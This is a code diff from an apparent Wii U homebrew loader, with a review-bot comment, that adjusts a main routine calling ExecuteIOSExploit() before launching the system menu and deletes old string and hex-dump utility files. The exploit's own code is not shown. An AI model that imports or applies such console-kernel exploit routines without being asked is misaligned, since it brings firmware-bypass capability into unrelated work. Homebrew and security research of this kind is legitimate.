DEBUG_FUNCTION_LINE("Load system menu"); DEBUG_FUNCTION_LINE("Load Wii U Menu");
// Restore the default title id to the normal wii u menu. // Restore the default title id to the normal Wii U Menu.
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0); unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(SYSTEM_APP_ID_HOME_MENU);
memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8);
DCStoreRange((void *) 0xF417FFF0, 0x8); DCStoreRange((void *) 0xF417FFF0, 0x8);
DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll); DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll);
ExecuteIOSExploit(); ExecuteIOSExploit();
SYSLaunchMenu(); SYSLaunchMenu();
@ -123,7 +104,7 @@ int main(int argc, char **argv) {
} }
ProcUIShutdown(); ProcUIShutdown();
DEBUG_FUNCTION_LINE("Bye!"); DEBUG_FUNCTION_LINE("Exiting.");
WHBLogUdpDeinit(); WHBLogUdpDeinit();
return 0; return 0;
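Review bot: The result of `ExecuteIOSExploit()` in the `loadWithoutHacks` branch is discarded and `SYSLaunchMenu()` runs regardless; ios_exploit.c declares it as `int ExecuteIOSExploit()` and returns 0 on the already-exploited path, so if a non-zero value is how failure is reported there, it should at least be logged before the launch, e.g. `int rc = ExecuteIOSExploit(); if (rc != 0) { DEBUG_FUNCTION_LINE("ExecuteIOSExploit returned %d", rc); }`. The new line `DEBUG_FUNCTION_LINE("Forcing start of title: %016llX\n", sysmenuIdUll);` also keeps a trailing `\n` that none of the other DEBUG_FUNCTION_LINE calls in this hunk use. main begins before this hunk.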


@ -1,290 +0,0 @@
/***************************************************************************
* Copyright (C) 2010
* by Dimok
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any
* damages arising from the use of this software.
*
* Permission is granted to anyone to use this software for any
* purpose, including commercial applications, and to alter it and
* redistribute it freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you
* must not claim that you wrote the original software. If you use
* this software in a product, an acknowledgment in the product
* documentation would be appreciated but is not required.
*
* 2. Altered source versions must be plainly marked as such, and
* must not be misrepresented as being the original software.
*
* 3. This notice may not be removed or altered from any source
* distribution.
*
* for WiiXplorer 2010
***************************************************************************/
#include <vector>
#include <string>
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <wchar.h>
#include <strings.h>
#include <wut_types.h>
#include <stdio.h>
#include <utils/StringTools.h>
BOOL StringTools::EndsWith(const std::string &a, const std::string &b) {
if (b.size() > a.size())
return false;
return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin());
}
const char *StringTools::byte_to_binary(int32_t x) {
static char b[9];
b[0] = '\0';
int32_t z;
for (z = 128; z > 0; z >>= 1) {
strcat(b, ((x & z) == z) ? "1" : "0");
}
return b;
}
std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) {
std::string output = input;
size_t position;
while (1) {
position = output.find(toBeRemoved);
if (position == std::string::npos)
break;
output.erase(position, 1);
}
return output;
}
const char *StringTools::fmt(const char *format, ...) {
static char strChar[512];
strChar[0] = 0;
va_list va;
va_start(va, format);
if ((vsprintf(strChar, format, va) >= 0)) {
va_end(va);
return (const char *) strChar;
}
va_end(va);
return NULL;
}
const wchar_t *StringTools::wfmt(const char *format, ...) {
static char tmp[512];
static wchar_t strWChar[512];
strWChar[0] = 0;
tmp[0] = 0;
if (!format)
return (const wchar_t *) strWChar;
if (strcmp(format, "") == 0)
return (const wchar_t *) strWChar;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
int bt;
int32_t strlength = strlen(tmp);
bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512);
if (bt > 0) {
strWChar[bt] = 0;
return (const wchar_t *) strWChar;
}
}
va_end(va);
return NULL;
}
int32_t StringTools::strprintf(std::string &str, const char *format, ...) {
static char tmp[512];
tmp[0] = 0;
int32_t result = 0;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
str = tmp;
result = str.size();
}
va_end(va);
return result;
}
std::string StringTools::strfmt(const char *format, ...) {
std::string str;
static char tmp[512];
tmp[0] = 0;
va_list va;
va_start(va, format);
if ((vsprintf(tmp, format, va) >= 0)) {
str = tmp;
}
va_end(va);
return str;
}
BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) {
if (!strChar || !dest)
return false;
int bt;
bt = mbstowcs(dest, strChar, strlen(strChar));
if (bt > 0) {
dest[bt] = 0;
return true;
}
return false;
}
int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) {
if (!string || !compare)
return -1;
char TokCopy[512];
strncpy(TokCopy, compare, sizeof(TokCopy));
TokCopy[511] = '\0';
char *strTok = strtok(TokCopy, separator);
while (strTok != NULL) {
if (strcasecmp(string, strTok) == 0) {
return 0;
}
strTok = strtok(NULL, separator);
}
return -1;
}
int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) {
if (!string || !extension)
return -1;
char *ptr = strrchr(string, seperator);
if (!ptr)
return -1;
return strcasecmp(ptr + 1, extension);
}
std::vector<std::string> StringTools::stringSplit(const std::string &inValue, const std::string &splitter) {
std::string value = inValue;
std::vector<std::string> result;
while (true) {
uint32_t index = value.find(splitter);
if (index == std::string::npos) {
result.push_back(value);
break;
}
std::string first = value.substr(0, index);
result.push_back(first);
if (index + splitter.size() == value.length()) {
result.push_back("");
break;
}
if (index + splitter.size() > value.length()) {
break;
}
value = value.substr(index + splitter.size(), value.length());
}
return result;
}
const char *StringTools::FullpathToFilename(const char *path) {
if (!path)
return path;
const char *ptr = path;
const char *Filename = ptr;
while (*ptr != '\0') {
if (ptr[0] == '/' && ptr[1] != '\0')
Filename = ptr + 1;
++ptr;
}
return Filename;
}
void StringTools::RemoveDoubleSlashs(std::string &str) {
uint32_t length = str.size();
//! clear path of double slashes
for (uint32_t i = 1; i < length; ++i) {
if (str[i - 1] == '/' && str[i] == '/') {
str.erase(i, 1);
i--;
length--;
}
}
}
// You must free the result if result is non-NULL.
char *StringTools::str_replace(char *orig, char *rep, char *with) {
char *result; // the return string
char *ins; // the next insert point
char *tmp; // varies
int len_rep; // length of rep (the string to remove)
int len_with; // length of with (the string to replace rep with)
int len_front; // distance between rep and end of last rep
int count; // number of replacements
// sanity checks and initialization
if (!orig || !rep)
return NULL;
len_rep = strlen(rep);
if (len_rep == 0)
return NULL; // empty rep causes infinite loop during count
if (!with)
with = "";
len_with = strlen(with);
// count the number of replacements needed
ins = orig;
for (count = 0; tmp = strstr(ins, rep); ++count) {
ins = tmp + len_rep;
}
tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1);
if (!result)
return NULL;
// first time through the loop, all the variable are set correctly
// from here on,
// tmp points to the end of the result string
// ins points to the next occurrence of rep in orig
// orig points to the remainder of orig after "end of rep"
while (count--) {
ins = strstr(orig, rep);
len_front = ins - orig;
tmp = strncpy(tmp, orig, len_front) + len_front;
tmp = strcpy(tmp, with) + len_with;
orig += len_front + len_rep; // move to next "end of rep"
}
strcpy(tmp, orig);
return result;
}


@ -1,65 +0,0 @@
/***************************************************************************
* Copyright (C) 2010
* by Dimok
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any
* damages arising from the use of this software.
*
* Permission is granted to anyone to use this software for any
* purpose, including commercial applications, and to alter it and
* redistribute it freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you
* must not claim that you wrote the original software. If you use
* this software in a product, an acknowledgment in the product
* documentation would be appreciated but is not required.
*
* 2. Altered source versions must be plainly marked as such, and
* must not be misrepresented as being the original software.
*
* 3. This notice may not be removed or altered from any source
* distribution.
*
* for WiiXplorer 2010
***************************************************************************/
#ifndef __STRING_TOOLS_H
#define __STRING_TOOLS_H
#include <vector>
#include <string>
#include <wut_types.h>
class StringTools {
public:
static BOOL EndsWith(const std::string &a, const std::string &b);
static const char *byte_to_binary(int32_t x);
static std::string removeCharFromString(std::string &input, char toBeRemoved);
static const char *fmt(const char *format, ...);
static const wchar_t *wfmt(const char *format, ...);
static int32_t strprintf(std::string &str, const char *format, ...);
static std::string strfmt(const char *format, ...);
static BOOL char2wchar_t(const char *src, wchar_t *dest);
static int32_t strtokcmp(const char *string, const char *compare, const char *separator);
static int32_t strextcmp(const char *string, const char *extension, char seperator);
static char *str_replace(char *orig, char *rep, char *with);
static const char *FullpathToFilename(const char *path);
static void RemoveDoubleSlashs(std::string &str);
static std::vector<std::string> stringSplit(const std::string &value, const std::string &splitter);
};
#endif /* __STRING_TOOLS_H */


@ -1,41 +0,0 @@
#include <string.h>
#include <stdlib.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <malloc.h>
#include "utils/logger.h"
// https://gist.github.com/ccbrown/9722406
void dumpHex(const void *data, size_t size) {
char ascii[17];
size_t i, j;
ascii[16] = '\0';
WHBLogPrintf("0x%08X (0x0000): ", data);
for (i = 0; i < size; ++i) {
WHBLogWritef("%02X ", ((unsigned char *) data)[i]);
if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') {
ascii[i % 16] = ((unsigned char *) data)[i];
} else {
ascii[i % 16] = '.';
}
if ((i + 1) % 8 == 0 || i + 1 == size) {
WHBLogWritef(" ");
if ((i + 1) % 16 == 0) {
WHBLogWritef("| %s \n", ascii);
if (i + 1 < size) {
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1);
}
} else if (i + 1 == size) {
ascii[(i + 1) % 16] = '\0';
if ((i + 1) % 16 <= 8) {
WHBLogWritef(" ");
}
for (j = (i + 1) % 16; j < 16; ++j) {
WHBLogWritef(" ");
}
WHBLogWritef("| %s \n", ascii);
}
}
}
}


@ -1,40 +0,0 @@
#ifndef __UTILS_H_
#define __UTILS_H_
#include <malloc.h>
#ifdef __cplusplus
extern "C" {
#endif
#define LIMIT(x, min, max) \
({ \
typeof( x ) _x = x; \
typeof( min ) _min = min; \
typeof( max ) _max = max; \
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
})
#define DegToRad(a) ( (a) * 0.01745329252f )
#define RadToDeg(a) ( (a) * 57.29577951f )
#define ALIGN4(x) (((x) + 3) & ~3)
#define ALIGN32(x) (((x) + 31) & ~31)
// those work only in powers of 2
#define ROUNDDOWN(val, align) ((val) & ~(align-1))
#define ROUNDUP(val, align) ROUNDDOWN(((val) + (align-1)), align)
#define le16(i) ((((uint16_t) ((i) & 0xFF)) << 8) | ((uint16_t) (((i) & 0xFF00) >> 8)))
#define le32(i) ((((uint32_t)le16((i) & 0xFFFF)) << 16) | ((uint32_t)le16(((i) & 0xFFFF0000) >> 16)))
#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32)))
//Needs to have log_init() called beforehand.
void dumpHex(const void *data, size_t size);
#ifdef __cplusplus
}
#endif
#endif // __UTILS_H_